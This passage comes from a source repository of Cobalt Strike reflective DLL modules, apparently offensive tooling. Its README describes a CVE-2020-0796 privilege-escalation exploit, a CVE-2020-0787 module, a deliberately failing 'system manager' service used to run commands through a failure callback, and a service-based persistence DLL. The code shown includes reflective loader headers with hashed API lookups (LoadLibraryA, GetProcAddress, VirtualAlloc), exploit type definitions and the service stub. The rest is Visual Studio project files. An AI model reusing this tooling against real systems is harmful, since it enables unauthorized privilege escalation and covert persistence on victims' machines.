NTFLUSHINSTRUCTIONCACHE)( HANDLE, PVOID, ULONG ); 42 | 43 | #define KERNEL32DLL_HASH 0x6A4ABC5B 44 | #define NTDLLDLL_HASH 0x3CFA685D 45 | 46 | #define LOADLIBRARYA_HASH 0xEC0E4E8E 47 | #define GETPROCADDRESS_HASH 0x7C0DFCAA 48 | #define VIRTUALALLOC_HASH 0x91AFCA54 49 | #define NTFLUSHINSTRUCTIONCACHE_HASH 0x534C0AB8 50 | 51 | #define IMAGE_REL_BASED_ARM_MOV32A 5 52 | #define IMAGE_REL_BASED_ARM_MOV32T 7 53 | 54 | #define ARM_MOV_MASK (DWORD)(0xFBF08000) 55 | #define ARM_MOV_MASK2 (DWORD)(0xFBF08F00) 56 | #define ARM_MOVW 0xF2400000 57 | #define ARM_MOVT 0xF2C00000 58 | 59 | #define HASH_KEY 13 60 | //===============================================================================================// 61 | #pragma intrinsic( _rotr ) 62 | 63 | __forceinline DWORD ror( DWORD d ) 64 | { 65 | return _rotr( d, HASH_KEY ); 66 | } 67 | 68 | __forceinline DWORD hash( char * c ) 69 | { 70 | register DWORD h = 0; 71 | do 72 | { 73 | h = ror( h ); 74 | h += *c; 75 | } while( *++c ); 76 | 77 | return h; 78 | } 79 | //===============================================================================================// 80 | typedef struct _UNICODE_STR 81 | { 82 | USHORT Length; 83 | USHORT MaximumLength; 84 | PWSTR pBuffer; 85 | } UNICODE_STR, *PUNICODE_STR; 86 | 87 | // WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY 88 | //__declspec( align(8) ) 89 | typedef struct _LDR_DATA_TABLE_ENTRY 90 | { 91 | //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. 92 | LIST_ENTRY InMemoryOrderModuleList; 93 | LIST_ENTRY InInitializationOrderModuleList; 94 | PVOID DllBase; 95 | PVOID EntryPoint; 96 | ULONG SizeOfImage; 97 | UNICODE_STR FullDllName; 98 | UNICODE_STR BaseDllName; 99 | ULONG Flags; 100 | SHORT LoadCount; 101 | SHORT TlsIndex; 102 | LIST_ENTRY HashTableEntry; 103 | ULONG TimeDateStamp; 104 | } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; 105 | 106 | // WinDbg> dt -v ntdll!_PEB_LDR_DATA 107 | typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes 108 | { 109 | DWORD dwLength; 110 | DWORD dwInitialized; 111 | LPVOID lpSsHandle; 112 | LIST_ENTRY InLoadOrderModuleList; 113 | LIST_ENTRY InMemoryOrderModuleList; 114 | LIST_ENTRY InInitializationOrderModuleList; 115 | LPVOID lpEntryInProgress; 116 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 117 | 118 | // WinDbg> dt -v ntdll!_PEB_FREE_BLOCK 119 | typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes 120 | { 121 | struct _PEB_FREE_BLOCK * pNext; 122 | DWORD dwSize; 123 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 124 | 125 | // struct _PEB is defined in Winternl.h but it is incomplete 126 | // WinDbg> dt -v ntdll!_PEB 127 | typedef struct __PEB // 65 elements, 0x210 bytes 128 | { 129 | BYTE bInheritedAddressSpace; 130 | BYTE bReadImageFileExecOptions; 131 | BYTE bBeingDebugged; 132 | BYTE bSpareBool; 133 | LPVOID lpMutant; 134 | LPVOID lpImageBaseAddress; 135 | PPEB_LDR_DATA pLdr; 136 | LPVOID lpProcessParameters; 137 | LPVOID lpSubSystemData; 138 | LPVOID lpProcessHeap; 139 | PRTL_CRITICAL_SECTION pFastPebLock; 140 | LPVOID lpFastPebLockRoutine; 141 | LPVOID lpFastPebUnlockRoutine; 142 | DWORD dwEnvironmentUpdateCount; 143 | LPVOID lpKernelCallbackTable; 144 | DWORD dwSystemReserved; 145 | DWORD dwAtlThunkSListPtr32; 146 | PPEB_FREE_BLOCK pFreeList; 147 | DWORD dwTlsExpansionCounter; 148 | LPVOID lpTlsBitmap; 149 | DWORD dwTlsBitmapBits[2]; 150 | LPVOID lpReadOnlySharedMemoryBase; 151 | LPVOID lpReadOnlySharedMemoryHeap; 152 | LPVOID lpReadOnlyStaticServerData; 153 | LPVOID lpAnsiCodePageData; 154 | LPVOID lpOemCodePageData; 155 | LPVOID lpUnicodeCaseTableData; 156 | DWORD dwNumberOfProcessors; 157 | DWORD dwNtGlobalFlag; 158 | LARGE_INTEGER liCriticalSectionTimeout; 159 | DWORD dwHeapSegmentReserve; 160 | DWORD dwHeapSegmentCommit; 161 | DWORD dwHeapDeCommitTotalFreeThreshold; 162 | DWORD dwHeapDeCommitFreeBlockThreshold; 163 | DWORD dwNumberOfHeaps; 164 | DWORD dwMaximumNumberOfHeaps; 165 | LPVOID lpProcessHeaps; 166 | LPVOID lpGdiSharedHandleTable; 167 | LPVOID lpProcessStarterHelper; 168 | DWORD dwGdiDCAttributeList; 169 | LPVOID lpLoaderLock; 170 | DWORD dwOSMajorVersion; 171 | DWORD dwOSMinorVersion; 172 | WORD wOSBuildNumber; 173 | WORD wOSCSDVersion; 174 | DWORD dwOSPlatformId; 175 | DWORD dwImageSubsystem; 176 | DWORD dwImageSubsystemMajorVersion; 177 | DWORD dwImageSubsystemMinorVersion; 178 | DWORD dwImageProcessAffinityMask; 179 | DWORD dwGdiHandleBuffer[34]; 180 | LPVOID lpPostProcessInitRoutine; 181 | LPVOID lpTlsExpansionBitmap; 182 | DWORD dwTlsExpansionBitmapBits[32]; 183 | DWORD dwSessionId; 184 | ULARGE_INTEGER liAppCompatFlags; 185 | ULARGE_INTEGER liAppCompatFlagsUser; 186 | LPVOID lppShimData; 187 | LPVOID lpAppCompatInfo; 188 | UNICODE_STR usCSDVersion; 189 | LPVOID lpActivationContextData; 190 | LPVOID lpProcessAssemblyStorageMap; 191 | LPVOID lpSystemDefaultActivationContextData; 192 | LPVOID lpSystemAssemblyStorageMap; 193 | DWORD dwMinimumStackCommit; 194 | } _PEB, * _PPEB; 195 | 196 | typedef struct 197 | { 198 | WORD offset:12; 199 | WORD type:4; 200 | } IMAGE_RELOC, *PIMAGE_RELOC; 201 | //===============================================================================================// 202 | #endif 203 | //===============================================================================================// 204 | -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/src/exploit.h: -------------------------------------------------------------------------------- 1 | #ifndef _EXPLOIT_H 2 | #define _EXPLOIT_H 3 | 4 | #include 5 | 6 | typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { 7 | PVOID Object; 8 | ULONG_PTR UniqueProcessId; 9 | ULONG_PTR HandleValue; 10 | ULONG GrantedAccess; 11 | USHORT CreatorBackTraceIndex; 12 | USHORT ObjectTypeIndex; 13 | ULONG HandleAttributes; 14 | ULONG Reserved; 15 | } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; 16 | 17 | typedef struct _SYSTEM_HANDLE_INFORMATION_EX { 18 | ULONG_PTR NumberOfHandles; 19 | ULONG_PTR Reserved; 20 | SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; 21 | } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; 22 | 23 | typedef enum _SYSTEM_INFORMATION_CLASS { 24 | SystemBasicInformation = 0, 25 | SystemProcessorInformation = 1, 26 | SystemPerformanceInformation = 2, 27 | SystemTimeOfDayInformation = 3, 28 | SystemPathInformation = 4, 29 | SystemProcessInformation = 5, 30 | SystemCallCountInformation = 6, 31 | SystemDeviceInformation = 7, 32 | SystemProcessorPerformanceInformation = 8, 33 | SystemFlagsInformation = 9, 34 | SystemCallTimeInformation = 10, 35 | SystemModuleInformation = 11, 36 | SystemLocksInformation = 12, 37 | SystemStackTraceInformation = 13, 38 | SystemPagedPoolInformation = 14, 39 | SystemNonPagedPoolInformation = 15, 40 | SystemHandleInformation = 16, 41 | SystemObjectInformation = 17, 42 | SystemPageFileInformation = 18, 43 | SystemVdmInstemulInformation = 19, 44 | SystemVdmBopInformation = 20, 45 | SystemFileCacheInformation = 21, 46 | SystemPoolTagInformation = 22, 47 | SystemInterruptInformation = 23, 48 | SystemDpcBehaviorInformation = 24, 49 | SystemFullMemoryInformation = 25, 50 | SystemLoadGdiDriverInformation = 26, 51 | SystemUnloadGdiDriverInformation = 27, 52 | SystemTimeAdjustmentInformation = 28, 53 | SystemSummaryMemoryInformation = 29, 54 | SystemMirrorMemoryInformation = 30, 55 | SystemPerformanceTraceInformation = 31, 56 | SystemObsolete0 = 32, 57 | SystemExceptionInformation = 33, 58 | SystemCrashDumpStateInformation = 34, 59 | SystemKernelDebuggerInformation = 35, 60 | SystemContextSwitchInformation = 36, 61 | SystemRegistryQuotaInformation = 37, 62 | SystemExtendServiceTableInformation = 38, 63 | SystemPrioritySeperation = 39, 64 | SystemVerifierAddDriverInformation = 40, 65 | SystemVerifierRemoveDriverInformation = 41, 66 | SystemProcessorIdleInformation = 42, 67 | SystemLegacyDriverInformation = 43, 68 | SystemCurrentTimeZoneInformation = 44, 69 | SystemLookasideInformation = 45, 70 | SystemTimeSlipNotification = 46, 71 | SystemSessionCreate = 47, 72 | SystemSessionDetach = 48, 73 | SystemSessionInformation = 49, 74 | SystemRangeStartInformation = 50, 75 | SystemVerifierInformation = 51, 76 | SystemVerifierThunkExtend = 52, 77 | SystemSessionProcessInformation = 53, 78 | SystemLoadGdiDriverInSystemSpace = 54, 79 | SystemNumaProcessorMap = 55, 80 | SystemPrefetcherInformation = 56, 81 | SystemExtendedProcessInformation = 57, 82 | SystemRecommendedSharedDataAlignment = 58, 83 | SystemComPlusPackage = 59, 84 | SystemNumaAvailableMemory = 60, 85 | SystemProcessorPowerInformation = 61, 86 | SystemEmulationBasicInformation = 62, 87 | SystemEmulationProcessorInformation = 63, 88 | SystemExtendedHandleInformation = 64, 89 | SystemLostDelayedWriteInformation = 65, 90 | SystemBigPoolInformation = 66, 91 | SystemSessionPoolTagInformation = 67, 92 | SystemSessionMappedViewInformation = 68, 93 | SystemHotpatchInformation = 69, 94 | SystemObjectSecurityMode = 70, 95 | SystemWatchdogTimerHandler = 71, 96 | SystemWatchdogTimerInformation = 72, 97 | SystemLogicalProcessorInformation = 73, 98 | SystemWow64SharedInformationObsolete = 74, 99 | SystemRegisterFirmwareTableInformationHandler = 75, 100 | SystemFirmwareTableInformation = 76, 101 | SystemModuleInformationEx = 77, 102 | SystemVerifierTriageInformation = 78, 103 | SystemSuperfetchInformation = 79, 104 | SystemMemoryListInformation = 80, 105 | SystemFileCacheInformationEx = 81, 106 | SystemThreadPriorityClientIdInformation = 82, 107 | SystemProcessorIdleCycleTimeInformation = 83, 108 | SystemVerifierCancellationInformation = 84, 109 | SystemProcessorPowerInformationEx = 85, 110 | SystemRefTraceInformation = 86, 111 | SystemSpecialPoolInformation = 87, 112 | SystemProcessIdInformation = 88, 113 | SystemErrorPortInformation = 89, 114 | SystemBootEnvironmentInformation = 90, 115 | SystemHypervisorInformation = 91, 116 | SystemVerifierInformationEx = 92, 117 | SystemTimeZoneInformation = 93, 118 | SystemImageFileExecutionOptionsInformation = 94, 119 | SystemCoverageInformation = 95, 120 | SystemPrefetchPatchInformation = 96, 121 | SystemVerifierFaultsInformation = 97, 122 | SystemSystemPartitionInformation = 98, 123 | SystemSystemDiskInformation = 99, 124 | SystemProcessorPerformanceDistribution = 100, 125 | SystemNumaProximityNodeInformation = 101, 126 | SystemDynamicTimeZoneInformation = 102, 127 | SystemCodeIntegrityInformation = 103, 128 | SystemProcessorMicrocodeUpdateInformation = 104, 129 | SystemProcessorBrandString = 105, 130 | SystemVirtualAddressInformation = 106, 131 | SystemLogicalProcessorAndGroupInformation = 107, 132 | SystemProcessorCycleTimeInformation = 108, 133 | SystemStoreInformation = 109, 134 | SystemRegistryAppendString = 110, 135 | SystemAitSamplingValue = 111, 136 | SystemVhdBootInformation = 112, 137 | SystemCpuQuotaInformation = 113, 138 | SystemNativeBasicInformation = 114, 139 | SystemErrorPortTimeouts = 115, 140 | SystemLowPriorityIoInformation = 116, 141 | SystemBootEntropyInformation = 117, 142 | SystemVerifierCountersInformation = 118, 143 | SystemPagedPoolInformationEx = 119, 144 | SystemSystemPtesInformationEx = 120, 145 | SystemNodeDistanceInformation = 121, 146 | SystemAcpiAuditInformation = 122, 147 | SystemBasicPerformanceInformation = 123, 148 | SystemQueryPerformanceCounterInformation = 124, 149 | SystemSessionBigPoolInformation = 125, 150 | SystemBootGraphicsInformation = 126, 151 | SystemScrubPhysicalMemoryInformation = 127, 152 | SystemBadPageInformation = 128, 153 | SystemProcessorProfileControlArea = 129, 154 | SystemCombinePhysicalMemoryInformation = 130, 155 | SystemEntropyInterruptTimingInformation = 131, 156 | SystemConsoleInformation = 132, 157 | SystemPlatformBinaryInformation = 133, 158 | SystemPolicyInformation = 134, 159 | SystemHypervisorProcessorCountInformation = 135, 160 | SystemDeviceDataInformation = 136, 161 | SystemDeviceDataEnumerationInformation = 137, 162 | SystemMemoryTopologyInformation = 138, 163 | SystemMemoryChannelInformation = 139, 164 | SystemBootLogoInformation = 140, 165 | SystemProcessorPerformanceInformationEx = 141, 166 | SystemSpare0 = 142, 167 | SystemSecureBootPolicyInformation = 143, 168 | SystemPageFileInformationEx = 144, 169 | SystemSecureBootInformation = 145, 170 | SystemEntropyInterruptTimingRawInformation = 146, 171 | SystemPortableWorkspaceEfiLauncherInformation = 147, 172 | SystemFullProcessInformation = 148, 173 | SystemKernelDebuggerInformationEx = 149, 174 | SystemBootMetadataInformation = 150, 175 | SystemSoftRebootInformation = 151, 176 | SystemElamCertificateInformation = 152, 177 | SystemOfflineDumpConfigInformation = 153, 178 | SystemProcessorFeaturesInformation = 154, 179 | SystemRegistryReconciliationInformation = 155, 180 | SystemEdidInformation = 156, 181 | SystemManufacturingInformation = 157, 182 | SystemEnergyEstimationConfigInformation = 158, 183 | SystemHypervisorDetailInformation = 159, 184 | SystemProcessorCycleStatsInformation = 160, 185 | SystemVmGenerationCountInformation = 161, 186 | SystemTrustedPlatformModuleInformation = 162, 187 | SystemKernelDebuggerFlags = 163, 188 | SystemCodeIntegrityPolicyInformation = 164, 189 | SystemIsolatedUserModeInformation = 165, 190 | SystemHardwareSecurityTestInterfaceResultsInformation = 166, 191 | SystemSingleModuleInformation = 167, 192 | SystemAllowedCpuSetsInformation = 168, 193 | SystemDmaProtectionInformation = 169, 194 | SystemInterruptCpuSetsInformation = 170, 195 | SystemSecureBootPolicyFullInformation = 171, 196 | SystemCodeIntegrityPolicyFullInformation = 172, 197 | SystemAffinitizedInterruptProcessorInformation = 173, 198 | SystemRootSiloInformation = 174, 199 | SystemCpuSetInformation = 175, 200 | SystemCpuSetTagInformation = 176, 201 | SystemWin32WerStartCallout = 177, 202 | SystemSecureKernelProfileInformation = 178, 203 | SystemCodeIntegrityPlatformManifestInformation = 179, 204 | SystemInterruptSteeringInformation = 180, 205 | SystemSupportedProcessorArchitectures = 181, 206 | SystemMemoryUsageInformation = 182, 207 | SystemCodeIntegrityCertificateInformation = 183, 208 | SystemPhysicalMemoryInformation = 184, 209 | SystemControlFlowTransition = 185, 210 | SystemKernelDebuggingAllowed = 186, 211 | SystemActivityModerationExeState = 187, 212 | SystemActivityModerationUserSettings = 188, 213 | SystemCodeIntegrityPoliciesFullInformation = 189, 214 | SystemCodeIntegrityUnlockInformation = 190, 215 | SystemIntegrityQuotaInformation = 191, 216 | SystemFlushInformation = 192, 217 | SystemProcessorIdleMaskInformation = 193, 218 | SystemSecureDumpEncryptionInformation = 194, 219 | SystemWriteConstraintInformation = 195, 220 | SystemKernelVaShadowInformation = 196, 221 | SystemHypervisorSharedPageInformation = 197, 222 | SystemFirmwareBootPerformanceInformation = 198, 223 | SystemCodeIntegrityVerificationInformation = 199, 224 | SystemFirmwarePartitionInformation = 200, 225 | SystemSpeculationControlInformation = 201, 226 | SystemDmaGuardPolicyInformation = 202, 227 | SystemEnclaveLaunchControlInformation = 203, 228 | SystemWorkloadAllowedCpuSetsInformation = 204, 229 | SystemCodeIntegrityUnlockModeInformation = 205, 230 | SystemLeapSecondInformation = 206, 231 | SystemFlags2Information = 207, 232 | SystemSecurityModelInformation = 208, 233 | SystemCodeIntegritySyntheticCacheInformation = 209, 234 | MaxSystemInfoClass 235 | } SYSTEM_INFORMATION_CLASS, * PSYSTEM_INFORMATION_CLASS; 236 | 237 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) // ntsubauth 238 | 239 | typedef ULONG NTSTATUS; 240 | 241 | typedef NTSTATUS(WINAPI* fpRtlGetCompressionWorkSpaceSize)(USHORT, PULONG, PULONG); 242 | typedef NTSTATUS(WINAPI* fpRtlCompressBuffer)(USHORT, PUCHAR, ULONG, PUCHAR, ULONG, ULONG, PULONG, PVOID); 243 | typedef NTSTATUS(WINAPI* fpNtQuerySystemInformation)(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 244 | 245 | #endif -------------------------------------------------------------------------------- /CVE-2020-0796_CNA/x64/Release/reflective_dll.x64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/CVE-2020-0796_CNA/x64/Release/reflective_dll.x64.dll -------------------------------------------------------------------------------- /ExitService/ExitService.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | SERVICE_STATUS ServiceStatus; 5 | SERVICE_STATUS_HANDLE hStatus; 6 | 7 | void ServiceMain(int argc, char** argv); 8 | void ControlHandler(DWORD request); 9 | 10 | int main(int argc, _TCHAR* argv[]) 11 | { 12 | SERVICE_TABLE_ENTRY ServiceTable[2]; 13 | ServiceTable[0].lpServiceName = (char*)"system manager"; 14 | ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain; 15 | ServiceTable[1].lpServiceName = NULL; 16 | ServiceTable[1].lpServiceProc = NULL; 17 | StartServiceCtrlDispatcher(ServiceTable); 18 | return 0; 19 | } 20 | void ServiceMain(int argc, char** argv) 21 | { 22 | hStatus = RegisterServiceCtrlHandler("system manager", (LPHANDLER_FUNCTION)ControlHandler); 23 | return; 24 | } 25 | 26 | void ControlHandler(DWORD request) 27 | { 28 | switch (request) 29 | { 30 | case SERVICE_CONTROL_STOP: 31 | ServiceStatus.dwWin32ExitCode = 0; 32 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 33 | SetServiceStatus(hStatus, &ServiceStatus); 34 | return; 35 | 36 | case SERVICE_CONTROL_SHUTDOWN: 37 | ServiceStatus.dwWin32ExitCode = 0; 38 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 39 | SetServiceStatus(hStatus, &ServiceStatus); 40 | return; 41 | default: 42 | //Stop service 43 | ServiceStatus.dwWin32ExitCode = -1; 44 | ServiceStatus.dwCurrentState = SERVICE_STOPPED; 45 | SetServiceStatus(hStatus, &ServiceStatus); 46 | return; 47 | } 48 | SetServiceStatus(hStatus, &ServiceStatus); 49 | return; 50 | } 51 | -------------------------------------------------------------------------------- /ExitService/ExitService.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /ExitService/ExitService.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.30907.101 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExitService", "ExitService.vcxproj", "{BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Debug|x64.ActiveCfg = Debug|x64 17 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Debug|x64.Build.0 = Debug|x64 18 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Debug|x86.ActiveCfg = Debug|Win32 19 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Debug|x86.Build.0 = Debug|Win32 20 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Release|x64.ActiveCfg = Release|x64 21 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Release|x64.Build.0 = Release|x64 22 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Release|x86.ActiveCfg = Release|Win32 23 | {BDC2A2B9-4702-412D-A804-F9C1E14C3DCD}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {A4CEABD9-6286-431D-A2CC-5B7353D313B8} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /ExitService/ExitService.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /ExitService/ExitService.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {bdc2a2b9-4702-412d-a804-f9c1e14c3dcd} 25 | ExitService 26 | 10.0 27 | ExitService 28 | 29 | 30 | 31 | Application 32 | true 33 | v142 34 | Unicode 35 | 36 | 37 | Application 38 | false 39 | v142 40 | true 41 | MultiByte 42 | 43 | 44 | Application 45 | true 46 | v142 47 | Unicode 48 | 49 | 50 | Application 51 | false 52 | v142 53 | true 54 | MultiByte 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | true 76 | 77 | 78 | false 79 | false 80 | false 81 | 82 | 83 | true 84 | 85 | 86 | false 87 | false 88 | false 89 | 90 | 91 | 92 | Level3 93 | true 94 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 95 | true 96 | 97 | 98 | Console 99 | true 100 | 101 | 102 | 103 | 104 | Level3 105 | true 106 | true 107 | true 108 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 109 | true 110 | MultiThreaded 111 | 112 | 113 | Console 114 | true 115 | true 116 | false 117 | NoErrorReport 118 | 119 | 120 | 121 | 122 | Level3 123 | true 124 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 125 | true 126 | 127 | 128 | Console 129 | true 130 | 131 | 132 | 133 | 134 | Level3 135 | true 136 | true 137 | true 138 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 139 | true 140 | MultiThreaded 141 | 142 | 143 | Console 144 | true 145 | true 146 | false 147 | NoErrorReport 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | -------------------------------------------------------------------------------- /ExitService/ExitService.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CobaltStrike Reflective Dll Source 2 | 3 | ### CVE-2020-0787_CNA 4 | CVE-2020-0787回显 5 | 6 | ### CVE-2020-0796_CNA 7 | 8 | CVE-2020-0796提权 9 | 10 | ### ExitService 11 | 12 | 一个在启动后会返回失败的服务程序,用于启动失败回调方式执行命令。 13 | 14 | ### Service_Reflective_dll 15 | 16 | 使用系统服务进行权限维持的反射DLL模块,支持中文服务名、描述;支持设置SDDL;支持设置服务启动方式(自启、手动、触发、启动失败回调)。 17 | -------------------------------------------------------------------------------- /Service_Reflective_dll/README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Service_Reflective_dll/Release/readme.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/Service_Reflective_dll/Release/readme.md -------------------------------------------------------------------------------- /Service_Reflective_dll/bin/readme.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/Service_Reflective_dll/bin/readme.md -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/Release/readme.md: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yanghaoi/ReflectiveDllSource/f554823e63146c5b3c9c64ab0f051964e3491697/Service_Reflective_dll/dll/Release/readme.md -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 10.00 3 | # Visual C++ Express 2008 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}" 5 | EndProject 6 | Global 7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 8 | Debug|Win32 = Debug|Win32 9 | Release|Win32 = Release|Win32 10 | EndGlobalSection 11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 12 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32 13 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32 14 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32 15 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32 16 | EndGlobalSection 17 | GlobalSection(SolutionProperties) = preSolution 18 | HideSolutionNode = FALSE 19 | EndGlobalSection 20 | EndGlobal 21 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.vcproj: -------------------------------------------------------------------------------- 1 | 2 | 11 | 12 | 15 | 18 | 19 | 20 | 21 | 22 | 29 | 32 | 35 | 38 | 41 | 44 | 55 | 58 | 61 | 64 | 71 | 74 | 77 | 80 | 83 | 86 | 89 | 92 | 93 | 100 | 103 | 106 | 109 | 112 | 116 | 127 | 130 | 133 | 136 | 143 | 146 | 149 | 152 | 155 | 158 | 161 | 164 | 165 | 173 | 176 | 179 | 182 | 185 | 188 | 200 | 203 | 206 | 209 | 218 | 221 | 224 | 227 | 230 | 233 | 236 | 240 | 241 | 249 | 252 | 255 | 258 | 261 | 265 | 280 | 283 | 286 | 289 | 299 | 302 | 305 | 308 | 311 | 314 | 317 | 321 | 322 | 323 | 324 | 325 | 326 | 331 | 334 | 335 | 338 | 339 | 340 | 345 | 348 | 349 | 352 | 353 | 354 | 355 | 356 | 357 | 358 | -------------------------------------------------------------------------------- /Service_Reflective_dll/dll/reflective_dll.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | ARM 7 | 8 | 9 | Debug 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | ARM 19 | 20 | 21 | Release 22 | Win32 23 | 24 | 25 | Release 26 | x64 27 | 28 | 29 | 30 | {3A371EBD-EEE1-4B2A-88B9-93E7BABE0949} 31 | reflective_dll 32 | Win32Proj 33 | 34 | 35 | 36 | DynamicLibrary 37 | v142 38 | MultiByte 39 | true 40 | 41 | 42 | DynamicLibrary 43 | v142 44 | MultiByte 45 | true 46 | 47 | 48 | DynamicLibrary 49 | v142 50 | Unicode 51 | 52 | 53 | DynamicLibrary 54 | v142 55 | Unicode 56 | 57 | 58 | DynamicLibrary 59 | v142 60 | MultiByte 61 | false 62 | 63 | 64 | DynamicLibrary 65 | v142 66 | Unicode 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | <_ProjectFileVersion>11.0.50727.1 92 | 93 | 94 | $(SolutionDir)$(Configuration)\ 95 | $(Configuration)\ 96 | true 97 | 98 | 99 | true 100 | 101 | 102 | $(SolutionDir)$(Platform)\$(Configuration)\ 103 | $(Platform)\$(Configuration)\ 104 | true 105 | 106 | 107 | $(SolutionDir)$(Configuration)\ 108 | $(Configuration)\ 109 | false 110 | false 111 | 112 | 113 | false 114 | 115 | 116 | $(SolutionDir)$(Platform)\$(Configuration)\ 117 | $(Platform)\$(Configuration)\ 118 | false 119 | 120 | 121 | 122 | Disabled 123 | WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;%(PreprocessorDefinitions) 124 | true 125 | EnableFastChecks 126 | MultiThreadedDebugDLL 127 | 128 | Level3 129 | EditAndContinue 130 | 131 | 132 | true 133 | Windows 134 | MachineX86 135 | 136 | 137 | 138 | 139 | Disabled 